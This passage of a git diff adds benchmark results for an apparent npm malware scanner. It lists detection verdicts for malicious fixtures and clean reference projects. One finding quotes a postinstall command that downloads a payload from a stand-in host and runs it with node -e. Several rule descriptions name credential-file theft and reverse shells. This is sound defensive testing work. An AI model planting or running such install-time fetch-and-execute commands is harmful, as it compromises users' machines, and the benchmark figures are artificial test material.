910018e9ea790fae8a6c9141550913cf26e5275d","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-install/MAL-2025-15287.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:910018e9ea790fae8a6c9141550913cf26e5275d:8082edb8ce35bdad9a7e5c961b346e42d7d218a3","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-15288","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-15288; report blob 4a51f824f7203deffb5fd237dc4105ebfbfeba03","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-npm-publish/MAL-2025-15288.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:4a51f824f7203deffb5fd237dc4105ebfbfeba03:c79c0836d3e4e5c0e39da8e406463977b538d0d7","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" +"malicious-osv-mal-2025-3985","real-malicious","known-malicious-metadata","OpenSSF OSV MAL-2025-3985; report blob eb426f1379301192517dbb30aad8a7b4e6993343","https://github.com/ossf/malicious-packages/blob/1fcca18f1775b47bd272362330684aa2dd1ad870/osv/malicious/npm/babel-loader-fs/MAL-2025-3985.json","osv:1fcca18f1775b47bd272362330684aa2dd1ad870:eb426f1379301192517dbb30aad8a7b4e6993343:655664c120057afcca26233ac537a2622d3d7e2c","SUSPICIOUS_DEPENDENCY","high","","completed","true","true","true","high","0.25","false","SUSPICIOUS_DEPENDENCY","high","high","","1","0","false","0","0.2.2","8c56989d719efb88051d0ac4d319abcdf63649fe","2026.07.12.002","193cd4906826ed458976c1f7b9b56bacc09019dd","" diff --git a/benchmark/results/post-fix-final.json b/benchmark/results/post-fix-final.json new file mode 100644 index 0000000..6b609c3 --- /dev/null +++ b/benchmark/results/post-fix-final.json @@ -0,0 +1,4589 @@ +{ + "metadata": { + "benchmarkVersion": "0.1.0", + "runAt": "2026-07-13T12:16:34.558Z", + "corpusPath": "/Users/tomas.tilnak/Documents/Codex/2026-07-12/ca/work/flagrix/flagrix-cli/benchmark/corpus.lock.json", + "cliVersion": "0.1.3", + "engineVersion": "0.2.2", + "engineCommitSha": "8c56989d719efb88051d0ac4d319abcdf63649fe", + "engineDirty": true, + "rulesVersion": "2026.07.12.002", + "rulesCommitSha": "193cd4906826ed458976c1f7b9b56bacc09019dd", + "rulesDirty": true + }, + "metrics": { + "samplesDefined": 90, + "samplesCompleted": 90, + "samplesPassed": 90, + "criticalFixturesDetected": 10, + "criticalFixturesTotal": 10, + "criticalFixtureDetectionRate": 1, + "maliciousSamplesDetected": 25, + "maliciousSamplesTotal": 25, + "maliciousDetectionRate": 1, + "referenceSamplesTotal": 55, + "referenceHighVerdicts": 0, + "referenceHighVerdictRate": 0, + "referenceSamplesWithHighOrCriticalFindings": 2, + "referenceCriticalFindings": 0, + "gates": { + "criticalFixtures100Percent": true, + "maliciousDetectionAtLeast90Percent": true, + "zeroCriticalReferenceFindings": true, + "referenceHighVerdictsAtMost5Percent": true + } + }, + "results": [ + { + "sampleId": "critical-keylogger-exfil-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed behavior: keyboard capture plus network sink", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:47ddfcaf4652dcead3194f3be5f4bdc8e1b43742", + "expectedDetectionCategories": [ + "EXFIL_KEYLOGGER" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "EXFIL_KEYLOGGER" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_KEYLOGGER", + "file": "src/fixture.js", + "line": 1, + "description": "Reads pressed keys from a keyboard handler and stores or transmits them" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 41, + "error": "" + }, + { + "sampleId": "critical-beavertail-loader-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed Lazarus BeaverTail loader structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:cd28e14b93bd48d8fc52714787299569897f6408", + "expectedDetectionCategories": [ + "BEAVERTAIL_LOADER_V1" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "BEAVERTAIL_LOADER_V1" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_LOADER_V1", + "file": "src/fixture.js", + "line": 1, + "description": "Matches BeaverTail malware loader pattern used by Lazarus Group in fake job interview repos" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 3, + "error": "" + }, + { + "sampleId": "critical-env-exfil-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed environment-variable exfiltration structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:11214d0e6bf271f10d443bf17c16d83232e2f297", + "expectedDetectionCategories": [ + "BEAVERTAIL_EXFIL" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "BEAVERTAIL_EXFIL" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BEAVERTAIL_EXFIL", + "file": "src/fixture.js", + "line": 1, + "description": "Environment variable exfiltration pattern — process.env dumped via fetch/axios POST" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 2, + "error": "" + }, + { + "sampleId": "critical-reverse-shell-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed reverse-shell socket structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:feff0e223beffb7e78b88ad496ff6f96c1871028", + "expectedDetectionCategories": [ + "REVERSE_SHELL" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "REVERSE_SHELL" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "REVERSE_SHELL", + "file": "src/fixture.js", + "line": 1, + "description": "Socket-based reverse shell connection — creates a TCP connection back to attacker" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-crypto-miner-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed cryptocurrency-miner endpoint structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:09955ea0b3c26412934cd61e99cc25a921f8c943", + "expectedDetectionCategories": [ + "CRYPTO_MINER" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "CRYPTO_MINER" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "CRYPTO_MINER", + "file": "src/fixture.js", + "line": 1, + "description": "Cryptocurrency mining code — uses CPU resources for attacker profit" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-obfuscated-eval-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed Base64-decoded dynamic execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:3f60ed22624352d562b694600d87f7a37bf81fe3", + "expectedDetectionCategories": [ + "OBFUSCATED_EVAL" + ], + "minimumExpectedVerdict": "medium", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4375, + "safeToClone": false, + "rulesTriggered": [ + "OBFUSCATED_EVAL", + "OBF_EVAL" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "OBFUSCATED_EVAL", + "file": "src/fixture.js", + "line": 1, + "description": "Base64-encoded eval execution — decodes and executes hidden payload" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "src/fixture.js", + "line": 1, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-rce-endpoint-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed request-driven remote-code-execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:e4084292f92b05d88db1c0b433a74ab63e8ff3ca", + "expectedDetectionCategories": [ + "BACKDOOR_RCE_ENDPOINT" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4375, + "safeToClone": false, + "rulesTriggered": [ + "BACKDOOR_RCE_ENDPOINT", + "OBF_EVAL" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "BACKDOOR_RCE_ENDPOINT", + "file": "src/fixture.js", + "line": 1, + "description": "eval() or exec() fed from HTTP request body/query — allows attacker to run arbitrary code" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "src/fixture.js", + "line": 1, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "critical-credential-file-read-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed credential-file access structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-detection-rules", + "immutableRef": "fixture-v1:895568b6b685834b3d6cf7186308ccc7f23f3cbe", + "expectedDetectionCategories": [ + "FILE_ACCESS_CREDENTIALS" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "FILE_ACCESS_CREDENTIALS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "FILE_ACCESS_CREDENTIALS", + "file": "src/fixture.js", + "line": 1, + "description": "Reads ~/.ssh/, ~/.aws/, id_rsa, or credentials files — credential theft" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "critical-aws-key-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed AWS access-key pattern using a reserved dummy value", + "sourceUrl": "https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_identifiers.html", + "immutableRef": "fixture-v1:ab32de596974e481f402ba256ae69b9cf9ce9e76", + "expectedDetectionCategories": [ + "HARDCODED_AWS_KEY" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "HARDCODED_AWS_KEY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "critical", + "confidence": "high", + "type": "MALWARE_SIGNATURE", + "rule": "HARDCODED_AWS_KEY", + "file": "src/fixture.js", + "line": 1, + "description": "AWS Access Key ID pattern (AKIA...) committed to source code" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "critical-install-script-v1", + "corpus": "critical-fixture", + "label": "known-malicious-structure", + "labelSource": "Flagrix claimed install-time download and dynamic execution structure", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1:611f7347091fa4506e2f4ef8884a30fd011f7314", + "expectedDetectionCategories": [ + "POSTINSTALL_SCRIPT" + ], + "minimumExpectedVerdict": "high", + "maximumExpectedVerdict": "", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "high", + "actualScore": 0.4, + "safeToClone": false, + "rulesTriggered": [ + "POSTINSTALL_SCRIPT" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "high", + "confidence": "unspecified", + "type": "POSTINSTALL_SCRIPT", + "rule": "POSTINSTALL_SCRIPT", + "file": "package.json", + "line": null, + "description": "postinstall script makes network requests: \"curl https://example.invalid/payload && node -e \"e...\"" + }, + { + "severity": "critical", + "confidence": "unspecified", + "type": "POSTINSTALL_SCRIPT", + "rule": "POSTINSTALL_SCRIPT", + "file": "package.json", + "line": null, + "description": "postinstall script executes dynamic code" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "reference-fixture-keyboard-shortcut-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for ordinary keyboard UI handling", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1:0ffca52988c432109773a57e23c338551b9c51b8", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "reference-fixture-placeholder-secret-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for documented placeholder configuration", + "sourceUrl": "https://github.com/9valleb9/SPY-Options-Dashboard", + "immutableRef": "fixture-v1:d55f3f65c602eb1f695a587f61db7d635bfa1ad7", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.05, + "safeToClone": true, + "rulesTriggered": [ + "HARDCODED_API_KEY" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "low", + "confidence": "high", + "type": "INSECURE_CONFIGURATION", + "rule": "HARDCODED_API_KEY", + "file": "app.py", + "line": 1, + "description": "Predictable placeholder secret must be replaced before deployment" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 1, + "error": "" + }, + { + "sampleId": "reference-fixture-flask-debug-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control: deployment warning must not be labeled a backdoor", + "sourceUrl": "https://github.com/9valleb9/SPY-Options-Dashboard", + "immutableRef": "fixture-v1:18c530bc5c541ea2a330c43493279fc8e9686e26", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.05, + "safeToClone": true, + "rulesTriggered": [ + "INSECURE_CONFIGURATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "low", + "confidence": "high", + "type": "INSECURE_CONFIGURATION", + "rule": "INSECURE_CONFIGURATION", + "file": "app.py", + "line": 1, + "description": "Flask debugger is exposed on all network interfaces; disable debug mode before deployment" + } + ], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "reference-fixture-detector-regex-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Regression control for security tools containing inert detector regexes", + "sourceUrl": "https://github.com/flagrix-io/flagrix-scanner-core", + "immutableRef": "fixture-v1:977043432c1a3f3ec5c5914bcdbb96c33c6e8995", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "reference-fixture-event-stream-safe-version-v1", + "corpus": "reference-fixture", + "label": "reference-clean", + "labelSource": "Version-bound negative control for the compromised event-stream 3.3.6 incident", + "sourceUrl": "https://github.com/dominictarr/event-stream", + "immutableRef": "package:event-stream@4.0.1:4989205f2c15c653baf5fd41bbacb8a7f6d55bad", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 1, + "filesSkipped": 0, + "treeTruncated": false, + "durationMs": 0, + "error": "" + }, + { + "sampleId": "reference-express", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/expressjs/express", + "immutableRef": "ae6dd37680e3a00618d6c8a3e522f0ee4eeba1a4", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 151, + "filesSkipped": 62, + "treeTruncated": false, + "durationMs": 2991, + "error": "" + }, + { + "sampleId": "reference-fastify", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/fastify/fastify", + "immutableRef": "de3752df84bb8dd35a8226bb467f05862f4da57c", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.075, + "safeToClone": true, + "rulesTriggered": [ + "OBF_BASE64_HEAVY", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "lib/config-validator.js", + "line": 1039, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "lib/schemas.js", + "line": 23, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 200, + "filesSkipped": 193, + "treeTruncated": false, + "durationMs": 3042, + "error": "" + }, + { + "sampleId": "reference-koa", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/koajs/koa", + "immutableRef": "52d5e8ff5ac79f2479463b53df2999900ae95115", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0, + "safeToClone": true, + "rulesTriggered": [], + "falsePositiveNotes": "", + "findings": [], + "filesScanned": 84, + "filesSkipped": 27, + "treeTruncated": false, + "durationMs": 2215, + "error": "" + }, + { + "sampleId": "reference-axios", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/axios/axios", + "immutableRef": "3ebc76240c835a07fc6af23cb10d41579371a08f", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.165, + "safeToClone": true, + "rulesTriggered": [ + "EXFIL_COOKIE", + "DATA_EXFILTRATION", + "NETWORK_COMMUNICATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_COOKIE", + "file": "lib/helpers/cookies.js", + "line": 5, + "description": "Reads browser cookies via document.cookie — can steal session tokens" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "lib/axios.js", + "line": null, + "description": "Data exfiltration patterns detected: Form Data Transmission" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "lib/helpers/shouldBypassProxy.js", + "line": 21, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + } + ], + "filesScanned": 200, + "filesSkipped": 254, + "treeTruncated": false, + "durationMs": 4852, + "error": "" + }, + { + "sampleId": "reference-lodash", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/lodash/lodash", + "immutableRef": "a666ba591064c8011988275790ad7d625279f09c", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.2025, + "safeToClone": true, + "rulesTriggered": [ + "OBF_HEX_STRINGS", + "EXFIL_COOKIE", + "OBF_BASE64_HEAVY", + "OBF_EVAL", + "OBF_NEW_FUNCTION", + "OBFUSCATED_CODE", + "NETWORK_COMMUNICATION", + "DATA_EXFILTRATION" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "dist/lodash.js", + "line": 226, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "dist/lodash.min.js", + "line": 16, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_HEX_STRINGS", + "file": "lodash.js", + "line": 226, + "description": "20+ hex escape sequences (\\xNN) in a single file. Hex encoding hides the actual string content from developers, often used to conceal URLs, commands, or shellcode.\n" + }, + { + "severity": "medium", + "confidence": "medium", + "type": "MALWARE_SIGNATURE", + "rule": "EXFIL_COOKIE", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 5997, + "description": "Reads browser cookies via document.cookie — can steal session tokens" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_BASE64_HEAVY", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 26455, + "description": "6+ base64 strings of 50+ chars in a single file. Base64 is a legitimate encoding, but excessive use in source code is a red flag — it's the most common way to hide malicious payloads, C2 URLs, and commands from static analysis.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 489, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 15309, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 31165, + "description": "Extremely long line detected (42,848 characters). Malicious code may be hidden far to the right. Affected: Line 31165 (42,848 chars)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_EVAL", + "file": "vendor/json-js/json2.js", + "line": 504, + "description": "eval() executes arbitrary dynamic code. While there are legitimate uses, eval() is the #1 technique for executing hidden malicious payloads.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "vendor/underscore/underscore-min.js", + "line": 5, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "OBFUSCATED_CODE", + "rule": "OBFUSCATED_CODE", + "file": "vendor/underscore/underscore-min.js", + "line": 5, + "description": "Extremely long line detected (16,194 characters). Malicious code may be hidden far to the right. Affected: Line 5 (16,194 chars)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "MALWARE_SIGNATURE", + "rule": "OBF_NEW_FUNCTION", + "file": "vendor/underscore/underscore.js", + "line": 1531, + "description": "new Function() creates and executes dynamic code similar to eval(). Used to hide malicious logic that bypasses some static analysis tools.\n" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "dist/lodash.js", + "line": 14567, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "NETWORK_COMMUNICATION", + "rule": "NETWORK_COMMUNICATION", + "file": "lodash.js", + "line": 14567, + "description": "Suspicious network communication detected: Hardcoded IP Address (1 occurrence)" + }, + { + "severity": "medium", + "confidence": "low", + "type": "DATA_EXFILTRATION", + "rule": "DATA_EXFILTRATION", + "file": "vendor/firebug-lite/src/firebug-lite-debug.js", + "line": 3348, + "description": "Data exfiltration patterns detected: Form Data Access" + } + ], + "filesScanned": 63, + "filesSkipped": 97, + "treeTruncated": false, + "durationMs": 5500, + "error": "" + }, + { + "sampleId": "reference-chalk", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/chalk/chalk", + "immutableRef": "aa06bb5ac3f14df9fda8cfb54274dfc165ddfdef", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.15, + "safeToClone": true, + "rulesTriggered": [ + "TYPOSQUAT_PACKAGE" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "unspecified", + "type": "TYPOSQUAT_PACKAGE", + "rule": "TYPOSQUAT_PACKAGE", + "file": "package.json", + "line": null, + "description": "Possible typosquat of \"mocha\": matcha" + } + ], + "filesScanned": 21, + "filesSkipped": 13, + "treeTruncated": false, + "durationMs": 2281, + "error": "" + }, + { + "sampleId": "reference-uuid", + "corpus": "reference-clean", + "label": "reference-clean", + "labelSource": "User-provided normal-project starter set", + "sourceUrl": "https://github.com/uuidjs/uuid", + "immutableRef": "ea83515d6a4de13a8f9d253fe772752c9dd7bbbe", + "expectedDetectionCategories": [], + "minimumExpectedVerdict": "", + "maximumExpectedVerdict": "low", + "status": "completed", + "testPassed": true, + "categoryDetected": true, + "verdictPass": true, + "actualVerdict": "low", + "actualScore": 0.09, + "safeToClone": true, + "rulesTriggered": [ + "SUSPICIOUS_FILE_ACCESS" + ], + "falsePositiveNotes": "", + "findings": [ + { + "severity": "medium", + "confidence": "medium", + "type": "SUSPICIOUS_FILE_ACCESS", + "rule": "SUSPICIOUS_FILE_ACCESS", + "file": "scripts/build.sh", + "line": 